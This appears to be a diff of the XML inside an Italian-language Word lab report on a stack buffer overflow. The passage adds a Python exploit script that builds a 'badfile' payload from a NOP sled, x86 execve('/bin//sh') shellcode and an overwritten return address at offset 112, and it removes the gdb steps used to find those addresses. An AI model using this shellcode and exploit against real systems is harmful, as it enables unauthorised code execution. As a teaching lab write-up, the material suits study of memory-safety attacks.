+        <w:t xml:space="preserve"> pointer, la distanza sarà 112.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">e) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>Generare l’input malizioso</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A questo punto si può passare a creare il contenuto per il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
           <w:kern w:val="3"/>
           <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+          <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:kern w:val="3"/>
           <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+          <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">e l’indirizzo del buffer andando ad utilizzare il comando </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>p</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> di </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gdb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>. Di seguito è riportato il codice Python che si può utilizzare per scrivere il contenuto del file, dato che sarà in binario e quindi difficilmente implementabile a mano.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Input malizioso</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> exploit.py</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -7480,35 +8067,21 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>(</w:t>
+              <w:t>#! /</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>gdb</w:t>
+              <w:t>usr</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>) p $</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>ebp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
+              <w:t>/bin/python3</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7523,7 +8096,7 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve">$1 = (void *) 0xbfffeaf8 </w:t>
+              <w:t>import sys</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7547,21 +8120,7 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>gdb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">) p &amp;buffer </w:t>
+              <w:t xml:space="preserve">shellcode= ( </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7576,21 +8135,192 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>$2 = (char (</w:t>
-            </w:r>
+              <w:t xml:space="preserve">        "\x31\xc0" </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">        "\x50" </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+              <w:t xml:space="preserve">        "\x68" "//</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>sh</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">" </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+              <w:t xml:space="preserve">        "\x68" "/bin"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">        "\x89\xe3" </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">        "\x50" </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">        "\x53"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">        "\x89\xe1"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">        "\x99" </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">        "\xb0\x0b"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">        "\</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>xcd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>\x80"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>*)[</w:t>
+              <w:t>).encode</w:t>
             </w:r>
             <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve">100]) 0xbfffea8c </w:t>
+              <w:t xml:space="preserve">(’latin-1’) </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7614,21 +8344,7 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>gdb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">) p/d 0xbfffeaf8 - 0xbfffea8c </w:t>
+              <w:t># Fill the content with NOPs</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7637,6 +8353,282 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">content = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>bytearray</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">0x90 for </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>i</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> in range(300)) </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t># Put the shellcode at the end</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">start = 300 - </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>len</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(shellcode) </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">content[start:] = shellcode </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t># Put the address at offset 112</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">ret = 0xbfffeaf8 + 120 </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>content[</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>112:116] = (ret).</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>to_bytes</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(4,byteorder=’little’) </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t># Write the content to a file</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">with </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>open(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>’</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>badfile</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>’, ’</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>wb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
